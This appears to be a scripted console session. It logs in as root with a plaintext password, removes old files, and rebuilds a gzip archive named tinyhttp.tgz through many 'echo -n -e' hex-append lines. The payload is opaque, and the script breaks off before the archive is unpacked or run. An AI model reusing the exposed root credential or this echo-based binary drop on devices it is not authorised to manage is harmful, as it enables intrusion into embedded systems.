root
ilovebv
cd /home/bvtech
rm tinyhttp.tgz
rm tinyhttp
umount /mnt/app
echo -n -e '\\x1F\\x8B\\x08\\x00\\x83\\x1B\\x04\\x60\\x00\\x03\\xED\\x5A\\x7D\\x74\\x54\\xC7\\x75\\x9F\\xB7\\xBB\\xFA\\x44\\xC0\\x02\\x32\\x96\\x41\\xB8\\x2F\\x8E\\x92\\xC8' >> tinyhttp.tgz 
echo -n -e '\\x35\\x88\\x27\\x24\\x40\\xE6\\xB8\\xC7\\x02\\x21\\x3E\\x62\\x81\\xD7\\x48\\xD4\\xD8\\xA5\\x79\\x5A\\xED\\x3E\\x7D\\xD8\\xAB\\xDD\\xCD\\xEE\\x4A\\x88\\xD4\\x8D' >> tinyhttp.tgz 
echo -n -e '\\x17\\xA4\\x80\\xEC\\x0A\\x2C\\x6C\\xC5\\x01\\x62\\xA2\\x4D\\xE3\\xD3\\x38\\x89\\x13\\x93\\xC6\\x3D\\xC7\\x4D\\xC1\\x47\\x72\\x7C\\x5A\\x27\\xC1\\x2D\\x89\\x49' >> tinyhttp.tgz 
echo -n -e '\\x4A\\x7D\\xDC\\xE4\\xED\\x2E\\x2F\\x08\\x70\\x12\\xA5\\x21\\xA9\\x93\\x10\\xAB\\xBF\\xFB\\xE6\\xBD\\xDD\\xD9\\x45\\x76\\x9B\\xB4\\xF9\\xA3\\xE7\\x78\\x75\\xAE' >> tinyhttp.tgz 
echo -n -e '\\xEE\\xDC\\xB9\\x77\\xEE\\xDC\\xF9\\xBA\\x33\\x6F\\xE6\\xC6\\x7A\\x82\\x7B\\xBB\\x63\\xB1\\x30\\xFB\\x03\\xFE\\x14\\x45\\x59\\xBB\\x76\\xB5\\x0C\\x5C\\xBB\\x76' >> tinyhttp.tgz 
echo -n -e '\\xB5\\x22\\x62\\xFA\\xD5\\x29\\x6B\\x56\\xAF\\x91\\x6B\\xEB\\x91\\xAB\\xD4\\xD6\\xAF\\xA9\\xAD\\x93\\x81\\xEA\\x57\\xAD\\x65\\xB2\\xF2\\x87\\x34\\xCA\\xFE\\xF5' >> tinyhttp.tgz 
echo -n -e '\\x45\\x63\\xDE\\x08\\x4C\\x09\\xF4\\x04\\xFB\\x06\\xFC\\x5A\\xFF\\x3B\\xC9\\xFD\\x77\\x7C\\xDE\\x18\\x39\\x83\\xFF\\x9F\\xFC\\x1E\\x6E\\x6E\\xD9\\x24\\x49\\x52' >> tinyhttp.tgz 
echo -n -e '\\x86\\x76\\xB0\\x6A\\x46\\xD4\\xD9\\x11\\xC6\\xEA\\x81\\x63\\x37\\x23\\xCF\\xC1\\x0A\\xEA\\x99\\xCC\\x8A\\xC0\\x5B\\xC6\\x96\\x10\\x3F\\x5C\\xB9\\x94\\xB1\\xCA' >> tinyhttp.tgz 
echo -n -e '\\x4F\\x73\\xD8\\xC5\\x38\\xB8\\x2C\\x28\\x64\\xBC\\x6C\\x7D\\x9C\\x83\\xCE\\x38\\x14\\x58\\x7C\\x27\\xA0\\x1C\\x4A\\xCA\\xF7\\x59\\xC0\\x38\\x10\\x4F\\xB2\\xC0' >> tinyhttp.tgz 
echo -n -e '\\xFC\\xC5\\x39\\x0C\\x2C\\xE5\\x50\\x60\\xE5\\x11\\x9F\\xE7\\x49\\x26\\x0C\\x21\\xE3\\x69\\x89\\xD7\\x4B\\x7C\\x07\\xD0\\xD0\\x52\\x02\\xC9\\x04\\x5B\\x69\\xA1' >> tinyhttp.tgz 
echo -n -e '\\x55\\xC7\\x3D\\x46\\xCC\\x3F\\x5B\\x5F\\x10\\xDF\\x0D\\x58\\x19\\xE8\\xE9\\x58\\x19\\xF0\\xAF\\xE8\\x6B\\x42\\xC2\\x57\\x13\\x0D\\xD5\\x28\\xEC\\x03\\xC8\\xFF' >> tinyhttp.tgz 
echo -n -e '\\x10\\xE0\\x26\\x40\\x31\\xA0\\x4C\\x28\\x93\\xFF\\xBB\\x11\\xF0\\x47\\x02\\x4D\\x65\\x97\\x01\\xDE\\x0F\\xA8\\x00\\x2C\\x00\\x54\\x59\\xBC\\x5B\\x04\\x39\\x87' >> tinyhttp.tgz 
echo -n -e '\\x90\\xA6\\xFE\\x58\\x08\\x40\\x33\\xD8\\x7C\\x2B\\x4F\\xB6\\xF0\\xCD\\x96\\x9D\\x95\\x80\\x0F\\xCE\\xD6\\x10\\xEB\\xE7\\xB4\\xB0\\xF4\\x2E\\x32\\xD4\\x1F\\x73' >> tinyhttp.tgz 
echo -n -e '\\xAC\\x74\\x89\\x90\\x5F\\x90\\x27\\x37\\x17\\xB0\\xC8\\x4A\\xCF\\x03\\x2C\\x06\\x94\\x5A\\xF4\\x12\\x40\\x91\\x95\\xBE\\x01\\xF0\\xBE\\x77\\xA9\\xEF\\x08\\x8C' >> tinyhttp.tgz 
echo -n -e '\\xD9\\x3D\\xCC\\xD3\\xD4\\xBE\\x5F\\x00\\xBA\\x05\\xFA\\xA8\\x20\\x2B\\x03\\x9E\\x95\\xF8\\x5C\\xF4\\x98\\xFC\\x39\\xEC\\x23\\xC0\\x71\\x41\\xFE\\x36\\xA1\\x71' >> tinyhttp.tgz 
echo -n -e '\\x44\\xF7\\x83\\x1E\\x11\\xF8\\x7F\\x97\\xA7\\x8F\\xFA\\xED\\xA8\\xC0\\xFF\\x38\\xCD\\x1D\\x81\\x26\\x99\\x93\\x02\\xDD\\x03\\xFE\\x29\\x81\\x6E\\x02\\xBC\\x22' >> tinyhttp.tgz 
echo -n -e '\\xD0\\x83\\xE0\\x9F\\x13\\xE8\\x34\\x40\\x17\\x68\\x3F\\xF8\\x6F\\x0A\\xF4\\x87\\xF2\\xEC\\xF9\\x66\\x1E\\xFD\\x35\\xC8\\x5F\\xAB\\xE4\\x8D\\x72\\x63\\x26\\xD1' >> tinyhttp.tgz 
echo -n -e '\\x7C\\x79\\x4B\\x28\\xFF\\x15\\x80\\xEB\\x91\\x2C\\xAD\\x91\\x9C\\x40\\xDF\\xCB\\x78\\x79\\x1A\\xD7\\x05\\x28\\xFF\\x1C\\x70\\xA5\\xC0\\x7F\\x15\\xAA\\x2B\\x97' >> tinyhttp.tgz 
echo -n -e '\\x65\\xF5\\x4F\\xE6\\xD1\\xF7\\x00\\x57\\x0B\\xF2\\x9F\\xCF\\xB3\\xE7\\xA5\\x3C\\xF9\\xBB\\x80\\xEB\\x05\\xF9\\x63\\x60\\x35\\x0A\\xF4\\xF7\\xF2\\xE4\\x13\\x39' >> tinyhttp.tgz 
echo -n -e '\\xFA\\x16\\xB3\\x07\\x81\\x5B\\x04\\xF9\\x3F\\x07\\x6B\\x97\\x40\\xEF\\x02\\xED\\x17\\xE8\\x16\\x72\\x3E\\x02\\x1D\\xCF\\xEB\\x3F\\xF8\\xE9\\x8E\\x68\\xCC\\xEF' >> tinyhttp.tgz 
echo -n -e '\\xBB\\xED\\x36\\x5A\\xB7\\x6B\\x58\\x44\\xF3\\x06\\x02\\x21\\x1F\\xEB\\xD5\\x7A\\x7B\\x43\\xFD\\x1A\\x53\\xEF\\xF7\\x07\\x3C\\xFD\\x4C\\xDD\\xDA\\xB6\\x4D\\xF5' >> tinyhttp.tgz 
echo -n -e '\\x6B\\x11\\xAD\\xAB\\x27\\x1A\\xD3\\x22\\x6D\\xDB\\x9A\\x02\\xA1\\xA0\\xD6\\xE6\\xED\\x08\\x68\\x2C\\x1A\\x8B\\x04\\x7D\\xBD\\x61\\xE6\\xED\\x08\\x45\\x62\\x28' >> tinyhttp.tgz 
echo -n -e '\\x10\\xDC\\xF3\\x00\\xF2\\x20\\x1C\\x61\\x9D\\x7B\\x22\\x3D\\x31\\x8D\\x75\\x86\\xC2\\x5A\\x90\\xA9\\x6A\\xD7\\xC0\\x80\\x1A\\xD6\\x22\\xD1\\x50\\xD0\\x1B\\xE8' >> tinyhttp.tgz 
echo -n -e '\\x89\\xED\\x55\\xFB\\x15\\x64\\x66\\xB5\\xAA\\x9D\\x11\\x6F\\xAF\\xA6\\xF6\\x04\\x3B\\x43\\xC8\\x9F\\x2D\\xB7\\xD3\\x17\\x08\\x45\\x61\\xD4\\x87\\xFB\\xD5\\x1D' >> tinyhttp.tgz 
echo -n -e '\\x16\\xBB\\x29\\xE0\\x8D\\x46\\xB5\\x28\\xB7\\x70\\x56\\xFB\\x54\\xD5\\x37\\xE0\\x55\\xB5\\xA0\\x5F\\xF5\\x05\\x34\\x6F\\xB0\\x2F\\x0C\\x1B\\x5B\\x63\\xAB\\x14' >> tinyhttp.tgz 
echo -n -e '\\x55\\x8D\\x75\\x47\\x42\\x7B\\xD4\\x80\\x16\\xEC\\x8A\\x75\\xAB\\xB0\\x37\\x14\\xF1\\xDC\\xE5\\xA3\\x1E\\xE9\\xE5\\x4E\\x0C\\xA9\\x2E\\x9F\\x4F\\x8D\\x12\\x55' >> tinyhttp.tgz 
echo -n -e '\\x0B\\x3D\\x5E\\xCD\\xDB\\xD1\\xA3\\xF6\\x05\\xF7\\xF4\\x90\\xB2\\x70\\x58\\x0D\\x47\\x4C\\x21\\xCB\\xE7\\x75\\x69\\x31\\xAF\\xDF\\x1F\\x31\\x2D\\x0D\\xF7\\xC5' >> tinyhttp.tgz 
echo -n -e '\\xA2\\x2C\\x8C\\x74\\xAC\\x13\\x7D\\xEA\\xEB\\x67\\x9D\\x11\\x4D\\xCB\\x70\\x7D\\xA1\\x60\\x50\\xF3\\xC5\\x58\\x14\\x56\\x41\\x2F\\x77\\x9C\\x6A\\xAF\\xB7\\x27' >> tinyhttp.tgz 
echo -n -e '\\xC8\\x62\\xA1\\x40\\x68\\x8F\\x16\\x61\\xD1\\x90\\xEF\\x41\\x0D\\xDD\\xA9\\xF9\\xBD\\x31\\x2F\\x64\\x3A\\xA2\\x51\\x95\\xB6\\xDE\\x98\\x98\\x56\\x55\\x8B\\xA2' >> tinyhttp.tgz 
echo -n -e '\\xD6\\x51\\xDA\\xC2\\xA4\\x76\\x73\\x53\\x93\\x5A\\x57\\xB3\\x9A\\x35\\xED\\xDA\\xB5\\x7E\\xC3\\x56\\xB5\\xB6\\xA6\\x8E\\x6D\\x6E\\xD9\\xBA\\x01\\x24\\xB2\\xEB' >> tinyhttp.tgz 
echo -n -e '\\xF9\\x0C\\x20\\x0F\\x4A\\x73\\xCB\\x99\\x99\\x13\\xB6\\x4F\\x75\\x59\\x58\\xF4\\x85\\x12\\xFE\\x1C\\xE6\\x7F\\x9B\\x72\\xE5\\xF0\\x68\\xDA\\xBA\\xAD\\x79\\xB5' >> tinyhttp.tgz 
echo -n -e '\\xF3\\x83\\x7B\\xE7\\x90\\xDE\\xD7\\x25\\x9B\\xEF\\x30\\xCB\\xB9\\x2D\\xF9\\xD7\\x9E\\x7B\\xB0\\x80\\x6A\\x49\\x59\\x65\\x62\\xB7\\x3E\\x5E\\x4C\\xB5\\xFF\\xD8' >> tinyhttp.tgz 
echo -n -e '\\x92\\xA7\\x39\\x5F\\x8E\\x8D\\x61\\x14\\x78\\x31\\xF2\\xC6\\x08\\xC3\\xB8\\xA3\\x84\\x61\\xEE\\x53\\x84\\xA1\\x21\\x41\\x18\\xCE\\xF4\\x69\\xC2\\x70\\xC8\\xCF' >> tinyhttp.tgz 
echo -n -e '\\x10\\x86\\xA3\\x7D\\x96\\x30\\x2C\\x38\\x49\\x18\\x9B\\xCF\\xF3\\x84\\xE1\\x94\\x5F\\x20\\x0C\\x87\\x7C\\x8A\\x30\\x36\\x8A\\x09\\xC2\\x30\\xE0\\x65\\xC2\\xD8' >> tinyhttp.tgz 
echo -n -e '\\x44\\x5E\\x21\\x0C\\xA7\\x7C\\x86\\x30\\x9C\\xF6\\x59\\xC2\\x70\\x2A\\xE7\\x08\\x63\\x73\\x39\\x4F\\x18\\x1B\\xCA\\x1B\\x84\\xB1\\x69\\xE9\\x84\\xB1\\x29\\x5D' >> tinyhttp.tgz 
echo -n -e '\\x20\\x8C\\x0D\\x6B\\x8A\\x30\\x36\\xAB\\x37\\x09\\x63\\x23\\x9B\\x26\\x8C\\x4D\\x67\\xEE\\x44\\x22\\x39\\xFD\\xC3\\x15\\x97\\x5C\\x27\\x5B\\x52\\xD3\\xCF\\x2D' >> tinyhttp.tgz 
echo -n -e '\\xBD\\xE4\\xD2\\x57\\x18\\x2E\\x7D\\xDC\\x98\\xA7\\x3F\\xA6\\x17\\x4F\\xBF\\x68\\x2C\\x1F\\x43\\xA3\\xFF\\xF1\\xB1\\x54\\xC9\\xB7\\x46\\x52\\xCB\\xAF\\x9E\\x32' >> tinyhttp.tgz 
echo -n -e '\\xEC\\x74\\x95\\x90\\xAE\\x14\\xD2\\xE5\\x42\\xBA\\x4C\\x48\\xBB\\x84\\xF4\\xB5\\x9F\\x67\\xD3\\x57\\x85\\xF4\\x9B\\x42\\xFA\\x82\\x90\\x7E\\x43\\x48\\x9F\\x13' >> tinyhttp.tgz 
echo -n -e '\\xD2\\x67\\x84\\xF4\\xCB\\x42\\xFA\\x94\\x90\\x7E\\x5E\\x48\\x3F\\x2B\\xA4\\x9F\\x16\\xD2\\x4F\\x09\\xE9\\x31\\x21\\x3D\\x22\\xA4\\x87\\x84\\xF4\\x43\\x42\\x3A' >> tinyhttp.tgz 
echo -n -e '\\x26\\xA4\\x03\\x48\\x4F\\x37\\xAD\\xB8\\x24\\x9D\\xDF\\x96\\x7A\\xEA\\xEC\\xB6\\xD4\\x5B\\x8E\\x71\\xC3\\xE3\\x4E\\xA4\\x8B\\x9C\\xEC\\x0A\\x8B\\x7B\\x52\\x5F' >> tinyhttp.tgz 
echo -n -e '\\x64\\xEC\\xEB\\x53\\xA9\\x71\\x63\\xF7\\xC4\\xA1\\xD4\\x7C\\xF6\\xE2\\xD4\\x7C\\xF6\\xEC\\x54\\x3E\\x2E\\x62\\x9F\\x99\\x62\\x4A\\x22\\xED\\x44\\x7A\\xB7\\xFB' >> tinyhttp.tgz 
echo -n -e '\\x50\\x8A\\xC9\\x67\\x8C\\x62\\x96\\x48\\x36\\xC8\\x89\\xF4\\x57\\x66\\x66\\xAE\\x34\\x30\\x4F\\xFA\\x30\\xB6\\xEA\\xA7\\x57\\x8D\\x1B\\x55\\xED\\xA4\\xE7\\x89' >> tinyhttp.tgz 
echo -n -e '\\xA9\\x72\\x53\\xDF\\xC8\\xD4\\x18\\x74\\xCF\\x67\\x07\\xA6\\x46\\x23\\xE3\\x86\\xD4\\x80\\xB2\\x13\\x89\\xB4\\x6B\\x14\\xB8\\x51\\x4F\\x1F\\x55\\x06\\x53\\x72' >> tinyhttp.tgz 
echo -n -e '\\xE3\\x01\\xA3\\x7C\\xE2\\x80\\x51\\x01\\xA8\\x04\\x54\\x01\\xAA\\x01\\xCB\\x01\\x0A\\xA0\\x1E\\x30\\x6F\\x62\\xF0\\xA2\\x6B\\xE2\\x11\\xA3\\x18\\x50\\x06\\x70' >> tinyhttp.tgz 
echo -n -e '\\x8F\\x1E\\x30\\xEB\\x3F\\x0A\\x5B\\xEE\\xB8\\x65\\xDC\\x20\\xDB\\x3E\\x03\\x3B\\x58\\xA3\\x27\\x75\\x37\\x63\\xAF\\x1F\\xF5\\x1C\\x4A\\x15\\x82\\x5F\\xE0\\x4E' >> tinyhttp.tgz 
echo -n -e '\\x24\\x5D\\x72\\x22\\x39\\x57\\x49\\x24\\x5F\\x94\\xD8\\x15\\xA9\\xE2\\x50\\xEA\\xA8\\x7B\\x5F\\xAA\\x48\\x39\\x72\\x11\\xAB\\x05\\xCB\\x29\\xB1\\xC8\\xD9\\xD8' >> tinyhttp.tgz 
echo -n -e '\\xA6\\x33\\x77\\xC2\\x29\\xB9\\xC9\\xE5\\xDF\\x93\\x76\\x7A\\x3E\\xA1\\xFF\\x74\\x66\\x06\\xC7\\x0E\\x4F\\xDA\\x00\\xAE\\x72\\x3F\\x69\\xBC\\x51\\x3B\\x6E\\x14' >> tinyhttp.tgz 
echo -n -e '\\x82\\xB7\\x1D\\xC7\\x92\\x72\\xD0\\x24\\x87\\x65\\x54\\x2A\\x55\\x43\\x9F\\xBC\\x3F\\xE5\\x54\\x1E\\xBF\\xC8\\x50\\x8F\\x9B\\x3D\\x69\\xD4\\xCD\\xAC\\x4C\\x92' >> tinyhttp.tgz 
echo -n -e '\\x3D\\xE5\\x0A\\xB7\\x71\\x08\\x76\\x8D\\xA2\\xBC\\x5D\\xB7\\x13\\x75\\xBB\\xE4\\x63\\xC6\\x88\\x34\\x6E\\x38\\x64\\x9F\\x5E\\xE6\\x3E\\x66\\x3C\\x0A\\x99\\xC0' >> tinyhttp.tgz 
echo -n -e '\\xFB\\xB2\\x32\\x2E\\xE5\\x98\\xE1\\x60\\x47\\x2E\\x3A\\x99\\x27\\x89\\x65\\x57\\xFA\\x09\\xF0\\xDB\\x21\\xDF\\xBE\\x60\\xDC\\xE8\\x45\\xBA\\x51\\xD0\\xC7\\x1A' >> tinyhttp.tgz 
echo -n -e '\\xA9\\x8D\\xC7\\x0C\\x27\\xE4\\x5D\\x68\\xA7\\x43\\x6E\\xD7\\x25\\x8C\\xEF\\x9D\\x90\\x73\\xA1\\xFE\\x8F\\x98\\xFD\\x92\\x48\\x97\\x51\\x19\\xDB\\x5E\\x06\\x7B' >> tinyhttp.tgz 
echo -n -e '\\xD1\\x3E\\xAC\\xA2\\xD2\\xF5\\x96\\x9C\\x74\\xFE\\x10\\xE6\\xC7\\xA1\\xD4\\xF4\\xE0\\xE9\\xA9\\x6B\\xCA\\xB8\\x71\\x8D\\x51\\xBF\\x3E\\x61\\x90\\xAE\\x1B\\x30' >> tinyhttp.tgz 
echo -n -e '\\xCE\\xB7\\x41\\x8E\\xDA\\x7E\\x16\\xBC\\xD9\\xDA\\x4F\\x6D\\x47\\x1F\\xA4\\xF3\\xDB\\xBF\\xD1\\xAC\\x5F\\x4F\\xFF\\x60\\x66\\xE6\\xF2\\xD3\\x28\\xFB\\x8C\\xA0' >> tinyhttp.tgz 
echo -n -e '\\x77\\x11\\xE4\\x6F\\x00\\x7F\\x0A\\xBC\\x61\\xF0\\x28\\x8F\\x78\\x37\\x22\\x7F\\x08\\x72\\xF3\\xC0\\x23\\x1D\\x75\\x96\\x8E\\x73\\x90\\x6B\\x87\\x5C\\x40\\xD0' >> tinyhttp.tgz 
echo -n -e '\\x71\\x13\\x64\\x5D\\x16\\xFF\\x0C\\xF8\\x55\\x8A\\xD0\\xD7\\xEC\\x48\\xA6\\x9D\\x45\\x90\\x59\\x48\\x6D\\x3D\\x0E\\xBF\\x07\\x78\\xE5\\x18\\xB6\\xF3\\x99\\xB7' >> tinyhttp.tgz 
echo -n -e '\\x67\\xBA\\x01\\x33\\x33\\x38\\xD7\\x01\\xC7\\x91\\x7F\\x14\\xF0\\xF4\\x71\\xEE\\x53\\xDB\\x80\\x03\\x80\\x3B\\x00\\x32\\x80\\x9D\\x84\\x7D\\x3A\\xEA\\x73\\x9F' >> tinyhttp.tgz 
echo -n -e '\\xB8\\x30\\x57\\xA6\\x7E\\x87\\x5F\\x62\\x2B\\x0C\\xF7\\xC4\\xB8\\xE1\\x9A\\x58\\x61\\x94\\xC1\\xAE\\x32\\xD4\\xFF\\x8B\\xB7\\x67\\x2E\\x97\\x51\\x5D\\xA8\\x63' >> tinyhttp.tgz 
echo -n -e '\\x18\\xE7\\x89\\x06\\x9C\\xB1\\x2A\\x91\\x5F\\x09\\xBE\\x53\\x69\\xD7\\x0B\\x59\\x6B\\xFA\\xE6\\x99\\x95\\x47\\xDC\\x66\\x5F\\x9A\\x69\\x69\\x11\\xFA\\x6D\\x06' >> tinyhttp.tgz 
echo -n -e '\\x75\\xDA\\xE7\\x17\\x6A\\x47\\x95\\x25\\xDF\\x54\\x9B\\x48\\x7E\\xEE\\xCE\\x41\\xFD\\x1B\\xEE\\x93\\x49\\x92\\x75\\xCB\\x54\\x6E\\x87\\x59\\x6E\\x21\\xCA\\x5D' >> tinyhttp.tgz 
echo -n -e '\\x13\\xCA\\xB9\\x1B\\x57\\x5C\\x5A\\xDE\\x48\\xFD\\x73\\xCE\\xD4\\xED\\x8E\\x9F\\xAE\\xF8\\x21\\x6C\\xA9\\xB4\\xEA\\x92\\x68\\x0E\\x43\\xEF\\x2F\\xDF\\x9E\\xB9' >> tinyhttp.tgz 
echo -n -e '\\x22\\x29\\xD4\\xDF\\x2F\\x1B\\x90\\x99\\x62\\xD6\\x39\\x2A\\x86\\x6F\\xAE\\x62\\xE8\\x68\\xB0\\xE4\\xB1\\x8D\\x94\\x2A\\x90\\x57\\xDC\\xE3\\xC6\\xE7\\x51\\x66' >> tinyhttp.tgz 
echo -n -e '\\xB9\\xD9\\xF7\\xA3\\x26\\x0F\\x5B\\x4B\\xA9\\x6C\\xC9\\x51\\x1F\\xD3\\xD8\\x17\\x37\\x9E\\x9E\\xFA\\x17\\x8C\\x83\\xAD\\xCB\\x05\\xBD\\xF1\\xA5\\x5C\\x77\\x03' >> tinyhttp.tgz 
echo -n -e '\\xF4\\x56\\x53\\x59\\xCC\\x59\\x89\\xB5\\x26\\x1B\\xE2\\xA7\\x9F\\x19\\x54\\x06\\xF5\\x46\\xCC\\x27\\xB3\\x7D\\x9E\\x44\\xB2\\xD1\\x9D\\xF8\\x5A\\x01\\xBB\\x27' >> tinyhttp.tgz 
echo -n -e '\\x29\\x79\\x12\\x9F\\xA5\\x7A\\x0A\\xCC\\x75\\x35\\x6A\\x94\\xBB\\xC7\\xCC\\xB5\\x55\\xED\\x19\\x32\\xCA\\xD9\\x90\\x81\\xB2\\x53\\x68\\x7F\\xB2\\xCC\\x1D\\x37' >> tinyhttp.tgz 
echo -n -e '\\x08\\x63\\x2D\\x27\\x1D\\x58\\xEF\\x07\\xD1\\xF7\\x6E\\xF8\\x39\\x05\\x75\\xB9\\x75\\xD3\\xDF\\x24\\xE7\\xB1\\xC3\\x53\\xB2\\xE7\\x04\\xFC\\x10\\xFC\\x18\\xE6' >> tinyhttp.tgz 
echo -n -e '\\x09\\x8D\\xA1\\xDB\\x33\\x62\\xC8\\x8D\\x23\\x46\\xB9\\x3E\\x62\\x54\\x00\\x2A\\x01\\x55\\x80\\x6A\\xC0\\x72\\x80\\x02\\xA8\\x27\\x8C\\xF6\\x90\\x1F\\x73\\x63' >> tinyhttp.tgz 
echo -n -e '\\x6D\\x50\\x3D\\xE5\\xEE\\x51\\x83\\xFA\\x98\\xD6\\x00\\xB5\\x03\\x7D\\x57\\x6C\\xF6\\x07\\xE6\\x21\\xD9\\x99\\x9D\\xFF\\x43\\x66\\xBF\\x56\\x21\\xAF\\x90\\x35' >> tinyhttp.tgz 
echo -n -e '\\xA6\\xDC\\xF3\\x43\\xC9\\x84\\x23\\x41\\xE3\\x97\\x2C\\x71\\xAF\\x4F\\xD5\\xA2\\xBC\\xF4\\xB3\\xF1\\x4F\\x6D\\x65\\xEC\\xF2\\xF4\\x63\\x38\\x17\\x8F\\x62\\xA6' >> tinyhttp.tgz 
echo -n -e '\\x5A\\xA0\\x08\\xE9\\xFF\\x2D\\x34\\xFC\\x8E\\xF2\\x8D\\xBF\\x67\\x3D\\x5B\\x00\\xE6\\x7C\\x92\\x47\\x8D\\x5D\\x98\\x2B\\xFB\\x6B\\x07\\x75\\xA7\\xF2\\x9D\\x8B' >> tinyhttp.tgz 
echo -n -e '\\x71\\xB9\\x29\\x35\\x23\\x3B\\x52\\x1B\\x31\\x5F\\xE7\\x2B\\xCE\\x94\\x43\\xDE\\x37\\xCA\\x94\\xB8\\x71\\xBE\\xE0\\xBB\\xF8\\x5C\\x4B\\x0C\\x52\\x7F\\x38\\x50' >> tinyhttp.tgz 
echo -n -e '\\x6E\\x1A\\x73\\xC6\\x09\\xFC\\x13\\x60\\xF8\\xB1\\xF4\\x9B\\xC0\\x05\\xC0\\x97\\x81\\x0B\\x81\\xC9\\x47\\x50\\xBF\\xFE\\x08\\xB8\\x1C\\xEB\\xEA\\x76\\xE8\\xA3' >> tinyhttp.tgz 
echo -n -e '\\x73\\x41\\x35\\x63\\x8F\\x2A\\x48\\xAF\\x64\\xEC\\x8F\\x4B\\x81\\x61\\x83\\x93\\xE6\\xEC\\x5C\\xA4\\xA1\\xD7\\xF9\\x21\\xFA\\x84\\xD4\\x47\\x8D\\xAB\\x58\\xA3' >> tinyhttp.tgz 
echo -n -e '\\xF3\\x26\\x47\\x60\\xD3\\x88\\x9E\\x50\\x5E\\x33\\xE6\\x4F\\x38\\x53\\x83\\x34\\x6F\\x27\\xE2\\xC6\\x2A\\xC8\\xE3\\x98\\xF3\\x28\\xE6\\x64\\x1A\\xC7\\x90\\xD2' >> tinyhttp.tgz 
echo -n -e '\\x7D\\xC0\\xCB\\xA8\\x9C\\x72\\xC4\\x68\\x87\\x1E\\xE7\\xAA\\x44\\x12\\xC7\\x94\\x47\\x1B\\x91\\x5E\\x2B\\x6F\\xD8\\xAF\\xC8\\x1B\\x1E\\x77\\x2A\\xFB\\x75\\xA6' >> tinyhttp.tgz 
echo -n -e '\\xEC\\x33\\xD0\\x86\\xB4\\x6B\\xFA\\xC4\\x85\\x09\\x94\\xC1\\x06\\x52\\x3A\\x09\\x3C\\xCF\\x2C\\x8B\\x79\\x06\\x3E\\xB3\\xF8\\xEB\\xC9\\x5E\\xC6\\xD6\\x6D\\xE2' >> tinyhttp.tgz 
echo -n -e '\\xF8\\xB8\\x57\\xD9\\x90\\x2A\\xE0\\xEB\\xF1\\x38\\xB5\\xEB\\x7B\\x56\\xFB\\x5F\\x03\\xB6\\x75\\xE2\\x8B\\xD6\\xB0\\xF7\\x29\\x4E\\x27\\xD2\\x64\\x0F\\xE4\\x93' >> tinyhttp.tgz 
echo -n -e '\\x8C\\xED\\x33\\x5E\\x9F\\x99\\x39\\x7E\\xAF\\xBC\\x21\\x95\\x6F\\x0B\\x95\\xB3\\xE7\\x1B\\xD1\\xD4\\x5F\\xD3\\x77\\x63\\xCE\\xC6\\x77\\xA4\\xCA\\xB1\\x36\\x9C' >> tinyhttp.tgz 
echo -n -e '\\x27\\x13\\xC9\\x5B\\xE8\\x13\\x9B\\xD6\\x61\\x7B\\x22\\x59\\x8C\\x75\\x27\\x8D\\x26\\xD2\\x95\\xE1\\x78\\xAA\\x4A\\x19\\x83\\x4F\\xC3\\xDA\\xC6\\xDC\\xDC\\x81' >> tinyhttp.tgz 
echo -n -e '\\xB9\\x79\\xEA\\x71\\xC6\\x86\\x00\\x77\\x00\\xCE\\x1F\\x61\\xEC\\x2A\\xB0\\x9C\\x80\\x0C\\xE4\\x4A\\xD9\\xCE\\x64\\x41\\x22\\xF1\\xD5\\x52\\x73\\x8D\\x8E\\x19' >> tinyhttp.tgz 
echo -n -e '\\x85\\x6E\\xF2\\xD5\\x2B\\x93\\x32\\x78\\x05\\x9E\\x07\\xD0\\xD7\\x0F\\xE8\\xE4\\x1B\\x64\\xAC\\x85\\x4D\\xA8\\x8F\\x74\\x97\\xB6\\x1F\\xD0\\x0B\\x94\\xA6\\x14' >> tinyhttp.tgz 
echo -n -e '\\xF5\\x75\\x13\\xB5\\x9D\\xED\\x4C\\x27\\xB1\\xCF\\x92\\xED\\x2C\\xFE\\x57\\x46\\x39\\xED\\x41\\x8F\\x9D\\x9E\\xCA\\xAF\\x83\\x74\\xDB\\xF5\\xCC\\x56\\x07\\xE9' >> tinyhttp.tgz 
echo -n -e '\\xA5\\x7A\\xEE\\xB0\\xEA\\xA1\\x3A\\xB0\\x7F\\x5F\\x2E\\x82\\x5F\\x90\\xDD\\x43\\x38\\xB3\\x7C\\xDF\\xF8\\x28\\xED\\x13\\xD8\\x0F\\x70\\x24\\x5D\\x42\\xE5\\x25' >> tinyhttp.tgz 
echo -n -e '\\x16\\x4D\\x0F\\x9B\\x57\\x0D\\xAD\\xE9\\x8F\\x23\\x0F\\xBE\\x26\\x5D\\x25\\x0F\\x19\\x38\\xC2\\x9A\\xE5\\x98\\xFB\\xFB\\xC6\\x22\\x94\\x29\\xA2\\x3D\\x04\\xFD' >> tinyhttp.tgz 
echo -n -e '\\x81\\xA3\\xEF\\xE5\\x18\\xCE\\x9E\\x15\\x4F\\x70\\xF0\\x58\\xE9\\x72\\xE0\\x33\\xC0\\x03\\x00\\xF2\\x57\\x64\\xB7\\xD8\\x1F\\x64\\x0F\\xF3\\x24\\xD2\\x64\\xD3' >> tinyhttp.tgz 
echo -n -e '\\x84\\xB9\\x47\\x71\\xFB\\x24\\x4F\\x73\\x4A\\x6A\\x3F\\x90\\xFA\\x07\\x6B\\xAE\\x57\\xC1\\x7E\\xF2\\x73\\xE4\\x5B\\x0A\\xC8\\x2E\\x4B\\x4F\\xEE\\xBE\\x3A\\x64' >> tinyhttp.tgz 
echo -n -e '\\x14\\x7B\\x34\\x9D\\xE6\\x02\\xF3\\x08\\xFD\\x35\\x3A\\x64\\x54\\x01\\xBE\\x08\\x5D\\xCB\\xD1\\x77\\xE5\\x28\\xBB\\x80\\xDD\\x9F\\x0E\\x98\\x73\\xFB\\xFE\\xF4' >> tinyhttp.tgz 
echo -n -e '\\x0E\\xF2\\xE3\\x13\\x63\\xD8\\x9F\\x0E\\x19\\x65\\xEE\\x13\\xA6\\x5E\\xEA\\x4F\\x36\\x71\\xC8\\x28\\x55\\xF6\\xE9\\xC5\\xE0\\xDD\\x61\\xDB\\x8A\\xFA\\x96\\xA3' >> tinyhttp.tgz 
echo -n -e '\\x1F\\xC8\\x46\\x05\\x98\\xF6\\x5D\\x05\\xF9\\xCB\\xDD\\x34\\x37\\x12\\x49\\xA7\\x7B\\x1F\\xCE\\x18\\xFB\\x52\\x8F\\xBE\\x4D\\x67\\x02\\xE4\\xCB\\x63\\x06\\xF1' >> tinyhttp.tgz 
